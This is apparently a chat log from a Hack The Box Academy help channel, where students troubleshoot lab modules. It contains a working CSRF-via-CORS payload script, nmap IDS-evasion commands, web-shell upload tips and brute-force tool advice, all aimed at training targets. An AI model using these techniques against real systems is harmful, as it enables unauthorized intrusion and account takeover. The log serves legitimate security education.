Currently working login bruteforcing skills assessment part 1... Provided username and password list has worked for folks on the forum, but I'm not turning up results. Any pointers? Reset instance several times. It's just basic HTTP auth... Hydra syntax isn't even complex. Wordlists are correct, and obtained from their links even though I already have seclists locally JUST TO BE SURE.... Really struggling to wrap my head around what I'm doing wrong with this one. Going to try mutating a wordlist after this, but that'll raise times to ungodly proportions so figured I would ask before I shot myself in the foot for no reason lol. Thanks in advance.

https://tenor.com/view/hhgf-gif-25031041

that moment when you find the other vulnerability

I started a penetration testing job role on Hack The Box (HTB) three days ago, and today I was working on the public exploits chapter. I spent two hours on it, but I still couldn’t capture the flag. The main issue is that I struggle with reading, so I would give ChatGPT all the reading material and ask it to summarize it for me. Today, when I used Nmap to check the target's service, I found that it had a UDP port and was running Apache 2.4.41. I searched for public exploits for Apache 2.4.41 but couldn’t find any, not even in Metasploit or any other database. After refreshing the target and trying again, I faced a session issue (the issue was no session establishes) . Even after asking ChatGPT for help, I couldn’t find a solution. It was frustrating when I provided a list of Apache exploits from Metasploit and asked for the specific exploit I could use to compromise the machine, but the responses were completely unhelpful. Despite trying to explain, ChatGPT just kept giving the same responses, which left me feeling stuck. I eventually turned off my laptop. I’m also taking notes, but I’m not satisfied with my progress and don’t feel like I’m fully benefiting from the course. I don’t feel like I’m truly learning from it.

Can someone help me out with some advice.

best to say what module/section/question you're stuck on

Module: getting started
Section: public exploits
Question: when i exploit, it gives error mentioning some session stuff

Have you tried visiting the website to see what's on there?

When you get a target that has a specific port next to the IP, that's the only port you need to focus on. You don't need to do an nmap scan etc.

Yeah it was just giving the information about service on which it’s running but I didn’t checked inspect

Visit the website and look at it, you may be able to find a public exploit for a plugin running on the web server.

Sure

is a tool that analyzes the relationships of users and groups in a network, showing ways to achieve certain goals

In short, it describes a tool.

I am trying to set up a pivoting tunnel with DNScat2. I need to the "listen" command for that but I can't find it

I aslo try to use the -h flag. But I received and error

Hello! i think there is an issue in the fingerprinting section int he information gathering - web edition

can anyone confirm?

What are you thinking the error is?

outdated servers and answers

If you previously completed the module, the questions may not line up due to an update to the module

no no, i didn't complete it before

but the module's questions and answers are outdated

for example, now the module server serves is NGINX

it was apache and the server asks for apache

although it's asking for NGINX and now, the current nginx version doesn't work

??

I think you may not be looking at the right target..

I'm getting the right answers on my end

Also, dnscat isn't mentioned I don't think?

The first two questions deal with app.inlanefreight.local, the third question deals with dev.inlanefreight.local

yes i am aware!

i mapped both to the same IP

which is correct

Well I'm getting the expected answers for the first and second question

did you get an apache?

because i am getting nginx

As i said. Expected answers on my end

yes it is mentioned in the Pivoting, Tunneling, and Port Forwarding module

Sure, what I meant was it's not in the module you're on currently

weird i will try again with a new machine

Was confused why it was being mentioned. nvm

Confirmed fine here also on new spawn

Could be you had an old IP listed or something? 🤷‍♂️

i checked but no

but now i removed everything from my hosts file and

i still have access to the web even after i terminated the machine

so i wonder what's happening

That's probably not the right target IP then tbh. Not sure what else to say. Restart VPN, start target again, try again

I wouldn't remove everything from your hosts file

i didn't mean the top part :P don't worry!

i meant all the older mappings

But aside from that:

i have access to the website even when nothing in my device is pointing to it

Likely cached

probably

you are correct ahhh

caching is so weird

always creates these confusing issues

Not really, it saves time for refetching pages

If you can still access it with curl for example, something else is going on

i am trying to inspect the issue!

Are you talking about the connection to the machine through openvpn?

Bottom line is, if you can access an IP after terminating a machine / target, you are connected to a different VPN.

yeah, it seems like that's what was happening

although the ip was there

now i created a new openvpn instance

it worked finally!

To be clear, were you curling the IP or the site

i curled the site absolutely

that was mapped in the hosts file

¯_(ツ)_/¯

things worked now tho! finally

awesome stuff

[-] Failed to load extension: No response was received to the core_enumextcmd request.
[-] Failed to load extension: No response was received to the core_loadlib request.```
What does it mean if right when the connection establishes and the stage is being sent to the target then the above is shown and the session that is supposed to open just closes right away

Anyone please?
#modules message

How do i know where and how many websites or services my contact number is linked to as i want to change my number everywhere and I don’t know where is my contact number is linked

I am doing SOCKS5 Tunneling with Chisel section. I tried to scan my network in order to find the ubuntu host but no luck. How would you go about finding the Ubuntu host ip if it was not given by the exercise?

fping?

there's no way unless your number is public on those sites; just go to your frequently used sites and update them

if you're signed up for that many sites and don't know which is tied to your number, you have a problem

When are they supposed to release the remaining modules for the AI Red Teamer path?

https://tenor.com/view/that-is-the-biggest-mystery-willy-wonka-and-the-chocolate-factory-is-the-biggest-secret-its-the-most-mysterious-thing-nobody-knows-that-gif-21430284

they will gradually release. exact release dates will not be known

does anyone know how to tell SSTIMap how to fuzz a particular field?

Instructions unclear... stuck in ceiling fan...

really?

can i have one too? 😭

you also want to point me to the support hub?

what is up with these bots

Yes

feels targeted honestly

really starting to want the Academy verification

I think it's funny XD

Hi

I cant uplod my images here for some reason

keeps saying upload failed

Do I need the Yoya when inserting my php web shell?

I tried changing the filename and also getting rid of all the red text and adding my php shell there

it didnt work tho or the site may be buggy

if you got rid if all the red text you got rid of the magic bytes

so I should get rid of them?

magic bytes are important

ahh ok

it tells the backend that yes this is <filetype>

idk which ones to keep and also the example didnt have any magic bytes

and not just a file uploaded as type

google

ok hold on

https://en.wikipedia.org/wiki/List_of_file_signatures

this question has never been asked before 😭🙏

@rustic sage keep it pg-13 bro, no one cares how desparate you are #rules

My question was PG 13

also very much NOT on topic of this channel

if you read and follow #welcome you can access more of the server

Hey man this could be moral question

You never know what could happen

don't care it's not on topic of the channel

Who hurt you

this channel is for discussion of academy modules and help with them

no one hurt me dude, just not flooding the channel with unrelated talk

told you how to access more of the server, if you even can read

Is not unrelated a threat actor could potentically do it and there should be a counter attack for weak system

my guy; topic of the channel is htb academy modules, not random shit

you also started off your statement about wanting a hot gf

so that's why it was removed

I think my statement was academic porpuse

:)

https://academy.hackthebox.com <-- this is what the channel is centered around

not random topics that have nothing to do with the learning modules or content of the site

if you read #welcome you'll see that this is the official server for https://www.hackthebox.com, a cybersecurity training website where you can train and practice your skills on https://app.hackthebox.com or learn various TTPs on https://academy.hackthebox.com

hacking a clinic camera is illegal

<@&861185840277487616>

you don't own the camera, nor do you have permission to access it

the important lesson is don't do illegal shit

if she's cheating on you then confront her without sneaking behind her back

and break it off if you're that paranoid

here is an important lesson, do not ask for how to do things with less than ethical intentions

for one: legal issues

i'd rather not go to jail because i think my gf is cheating on me because i'm insecure

this question will not be moral, you can stop the conversation here.

^

please keep it legal

and on-topic of the channel

Can't wait for the academy verification... 😅

g0b alt spotted he was testing the mods

👀

Damn, looks like I missed something.

of them all...

Why can't I post a .gif?

wadafawk?

@valid viper you need to be Silver+ or Hacker+

Bah...

Screaming at me

??

is this part of a module?

No like i'm researching

this channel is for questions about academy stuff

Okok suure my bad

hey guys , I was going thru Linux Fundamentals - Working with Web Services and it seems like this page is slightly broken as you cant claim the cube nor view the rest of the lesson on the right as you typically should be able to. I put a photo of the lesson , and then the lesson that is after as well , any pointers in claiming the progress/cubes?

anyone have this same issue with this lesson in particular ?

is that what you see in your browser? make sure you're not zoomed in and press CTRL+SHIFT+R

nothing

is it full screen or something? press f11

no its not full screen, i have a huge monitor lol... anyways , can you recreate the issue yourself or does it work for you ?

Just asking for help with a Tier 3 module assessment.. I advise you re-read the module contents, try to put in to words what you are struggling with, and pay close attention to the module as you go through it again. Everything you need is in the sections prior to the assessment @next stone

i don't even know what's wrong, you posted a cropped image of your browser

i posted exactly what you need to se

If you are still struggling, I'd suggest in a low level describing how you are struggling, without spoiling the content itself.

try it out

the page loads fine for me

maybe disable extensions or try another browser

pic?

thank you m8

It looks like perhaps you don't have Javascript enabled

I say this, as the markdown is not being parsed in your screenshot

youre right.. No wonder it was looking a little funky, interesting

can someone explain stack alignment in asm? I cant figure out the logic behind it

when your stack sits at a memory addr thats a multiple of a specific boundary

has anyone around here encountered issues with ligolo and ssh ?

Could be SSH trying to bind to the same port as ligolo

Help . Im gonna publish the Introduction to earn Cubes but I found stuck at this question with ... no answer place ? HELP !

{I cant send image}

Which module, which section, and which question?

[ The question : This is a tier 0 "free" module . .... ]

https://academy.hackthebox.com/module/15/section/34

pls help

I know but how to Submit

AFK a bit I'll rigth back

like 6.pm timeline +7

I think you might be on to something, thanks for chipping in, looking into ways to specify the source port for ssh, you would think that after decades of this protocol they could have included a -p option to specify the source port.....

@waxen totem you are a legend among legends. That was it. Leaving below how I got it working

ssh -o 'ProxyCommand=socat STDIO TCP4:%h:%p,bind=0.0.0.0:40000' <user>@<host>

I don't even know what half that command does but ok

it basically tells ssh to connect through a socat "proxy", which lets you specify the source port

ohhh, kewl

not sure if proxy is the correct term though

hi, anyone here completed Attacking WPA/WPA2 Wi-Fi Networks - Skills Assessment ? Need some help

Hello guys I just stuck on this module. The question is " Inspect the ARP_Poison.pcapng file, part of this module's resources, and submit the total count of ARP requests (opcode 1) that originated from the address 08:00:27:53:0c:ba as your answer."
So I applied a filter in Wireshark arp.opcode == 1 && eth.src == 08:00:27:53:0c:ba
and I still not get it how I suposed to find the number of ARP requests.
Any ideas about that? Thank you!

Statistics tab or the packet number at the bottom

I'd seriously appreciate some help on the hard lab in Network enumeration with nmap - IDS/IPS evasion techniques. I've tried using multiple flags such as -sS, -Pn and built in nmap scripts but its either returning as filtered or erroring out.
Example commands I've tried
nmap -sS -Pn -T2 -p1,1000 <target_ip>
nmap -sU -Pn -T1 -p1,1000
It wants me to identify the version of a certain service, the only services i get returned are ssh and html. tried entering the apache version (2.4.29) and the openssh version (7.6p1) to no avail.

this is my second time asking for help on this module section.

Have you tried —source-port ?

like putting a random number in for the port?

you need to figure out what port thats getting filtered first

what techniques can i do to find that out?

nmap -sA -Pn -p1-1000 <target_ip>

—source-port is good with 53 (dns)

https://nmap.org/book/man-bypass-firewalls-ids.html

message me if you are still stuck

hello, I'm new in the HTB, can i ask how to obtain more cubes?

The easiest way is to buy. Directly or by subscription

This

copy

i'm on the same module it's so unintuitive , can someone explain to me why using the first command, port 53 is filtered and using the second it isn't? I used the same source port on both. Does it have to do with disabling arp and ICMP echo requests or the fact that i put more ports to scan on the second? (i'll delete the screens after someone answers to avoid spoiling too much)

i tried rerunning the exact first scan and now it's showing the port as open and running -sV lmao I don't get it

I got stuck on "Bypassing CSRF Tokens via CORS Misconfigurations" exercise.
Here is what I have been trying which seems to be correct but when debugging, it appears it's not working. Any help is much appreciated. Thanks.
Payload:
||```js
<script>
// GET CSRF token
var xhr = new XMLHttpRequest();
xhr.open('GET', 'https://bypassing-csrftokens.htb/profile.php', false);
xhr.withCredentials = true;
xhr.setRequestHeader('Origin', 'null');
xhr.send();
var doc = new DOMParser().parseFromString(xhr.responseText, 'text/html');
var csrftoken = encodeURIComponent(doc.getElementById('csrf_token').value);
// do CSRF
var csrf_req = new XMLHttpRequest();
var params = promote=htb-stdnt&csrf_token=${csrftoken};
csrf_req.open('POST', 'https://bypassing-csrftokens.htb/profile.php', false);
csrf_req.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
csrf_req.withCredentials = true;
csrf_req.send(params);
</script>

that was on the medium lab* i forgot to mention that

oh ok

i just didn't get why the same command was producing two different results lol

but yeah i finished the module i was just curious

can anyone suggest me a good tool to bruteforce smb and rdp , netexec is not working so used crackmapexec and it is slow and thinking of using medusa

I am stuck at Signature Wrapping Attack for 5 days. I keep getting the error: Invalid SAML Response. Not Authenticated. anyone free to dm what went wrong with my payload?https://academy.hackthebox.com/module/170/section/1676

please do not join that server, it is not affiliated with HTB in any way

^

user banned

then anyone can help point out my mistake, I can dm privately?

if you are beautifying the SAML responses, the server will not accept your responses

I am not beautifying the response but somehow my payload still does not work. please can you take alook at my payload?

it's been a while but you can DM me the payload

DMed thank you.

i am at module = password attacks , on practise lab hard and port which are open msrpc smb rdp nfs i wanted to bruteforce rdp and smb i used hydra on rdp and got password but it was false possitive so used netexec and crackmapexec and they are very slow . i was thinking of using medusa for smb and rdp but it is not working on smb and it does not have rdp module

??

please keep the channel on-topic

and please don't copy paste in other irrelevant channels

can anyone suggest me what i can do here other than bruteforcing and if bruteforce which tool i can use . i know there is no perfect tool but i cannot use hydra and netexec , crackmapexec are very slow

Kerbrute for AD

Can we do smb or rdp with it

Depends on the env setup and what you want. Is it Domain joined? Do you want to test already known credentials for these kind of services access?

Cause if you are only password spraying to find a a valid credential in a Domain environment, you can do it with Kerbrute and then test for what level of access the enumerated accounts have

hi there guys I need bit help with this. Here I'm stuck bit.

hey there, what tier is this module ? if it;s above tier 0 then I think it would be better to mark that as spoiler

0😅

btw you're only scanning ports 1 and 1000 here not a range

ranges use a - not a comma

a comma separated list says scan ports x,y,z

-p- scans all ports 😉

Hi there, can anyone give me a small hint to the Footprinting Module -> Footprinting Medium lab?
I do not provide any details yet, since I don't want to spoil stuff

don't overthink it

Easier said than done 😅

don't try and run fancy commands or flags, keep it simple and basic

So far I scanned the ports mounted a drive, found a username and password, but have not yet the proper "next" service, for which I can use those credentials

someone can help me pls? 🙂

i take it you scanned all ports? :P

Yes I did. But I just opted for the Solution. I mean I know now what you mean with go the "direct" path... but still it is not as straight forward to get to the solution. You have to jump through multiple hoops for that. I hope there will be one day, where I am able to solve those easy questions quicker... But for now, I just need help all the time.

But I guess, this stuff just takes a looooooot of time to master

Hi guys I need help with blacklist filters in file uploads. I uploaded my php webshell through burp and changed the extension to something that shouldn't be blackilisted. I tried both methods of keeping the magiv bytes there and removing them in burp before adding my web shell. It still gives me a weird and long "src" in the website and its differetnt to the example, however the file does get successfully uploaded

i don't suggest skipping to the solution

you won't learn anything this way

you'll just learn to be reliant on the easy way out

you still need the magic bytes on the backend

I mean its true... I guess I try to ask more in those forums to get the solution on my own 👌

everything you need to complete the skill assessments are in the module itself

The module doesnt say anything to do with magic bytes. Why is that? Also like I said, I did leave the magic bytes there since you told me yesterday but idk it still didnt work. I'll send the src here

<last line of header>

<magic bytes>

<content>

no

it's above t0 so spoiling content

alr cool, its really weird tho. Like its a really long paragraph of letters and numbers 😅

Im pretty sure thats what I did

like it was thrown into base64? 🤔

yes! basically

i'll wait for the dots to click

But continuing from general, I connected to us academy 4, which is currently low level, and tried both udp and tcp protocols.

It’s not like an urgent problem or anything. It’s simply that I can’t continue or answer the questions without accessing the machine.

reach out to support

guys i need bit help 😄

¯_(ツ)_/¯

not many people have done the BOF modules, just be patient

okey i'm so sorry

Okay, although I’m pretty sure I won’t hear back until Monday.

support does work weekends, just lower staff

so don't expect an immediate reply

Fair enough.

i'm going to follow trying

i suggest trying to restart your vm and connecting again; ensuring only 1 tun device is active

Looking for some guidance on "Lateral Movement", "Skill Assessment" final question. I have got everything up to the connection, but when I try to connection through proxychains all ports return connection refused. Anybody have any pointers?

Well I did manage to get it fixed and made some progress.

today i did many hours already i'm good for today good night people.

sudo proxychains <command>

in this modul when i enter the zap and activate the hud and open firefox with the ip given i still click the break button but it steel off idk why ?? https://academy.hackthebox.com/module/110/section/1048

If you use the VM provided by HTB academy, do you also have frequent issues with the connectivity to the target boxes? I for example am getting kicked out all the time from ssh connections, or my nmap scans are interupted

Are you connected to the VPN on your VM at the same time you're using the pwnbox?

Is any one solve AI Red Teamer?

Nope. Just the pwnbox.

hey small problem, i am at the skills assesment for login brute forcing and the first part is this login page thats not a page, its the website requesting the login stuff via / and when i try hydra to get any info from it all it says is 1 of 1 target completed 0 passwords found, i have tried burp and some other random stuff like admin : admin and more but because it needs the login stuff before you get access its just weird.

try with user

that's because when you log in you get info on how to craft a password for the second assessment, one of the very few and far between where the assessments build off each other

Thanks I got in and did the whole ftp stuff easily, it was just starting that was hard

just gotta think inside the box at times ¯_(ツ)_/¯

yeah you wouldnt think admin admin would be a login, or user, but i guess they train you that way for a reason

If I go through the modules as a complete beginner. Will you learn all you need to learn to get through the CTFs or do you need more knowledge than that?

I was looking into the training from Hackers Arise occupy the web guy

OTW is a sham

but the modules teach you how to not only attack a vulnerability but to identify it as well

as far as for ctfs? sure, you can use the knowledge for ctfs

but the knowledge goes beyond ctfs and is applicable to real world scenarios

I'm stuck on RDP and SOCKS Tunneling with SocksOverRDP on the pivot module. Whenever i start the dllregisterserver i get a notification that the plugin suceeded, but it never actually works. I dont get the socksrdp plugin is enabled notification when I start up mstsc.exe, and when i run netstat -antb | findstr 1080, nothing is returend.

Working through the Attacking Common Applications. Came across dehashed.py which refers to dehashed.com. Is dehashed.py a script you make or is it in HTB-Academy?

I disabled windows defender rtm, any ideas?

here this screenshot shows pretty much everything, and it really should be a simple lab

@zinc mason

Hi